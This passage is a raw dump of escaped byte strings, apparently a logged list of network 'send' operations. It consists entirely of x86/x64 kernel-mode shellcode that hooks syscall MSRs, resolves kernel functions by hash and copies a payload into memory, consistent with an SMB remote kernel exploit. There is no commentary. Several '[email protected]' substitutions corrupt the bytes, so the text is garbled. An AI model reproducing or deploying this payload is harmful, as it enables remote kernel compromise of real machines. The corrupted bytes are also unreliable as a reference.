\\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 10, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\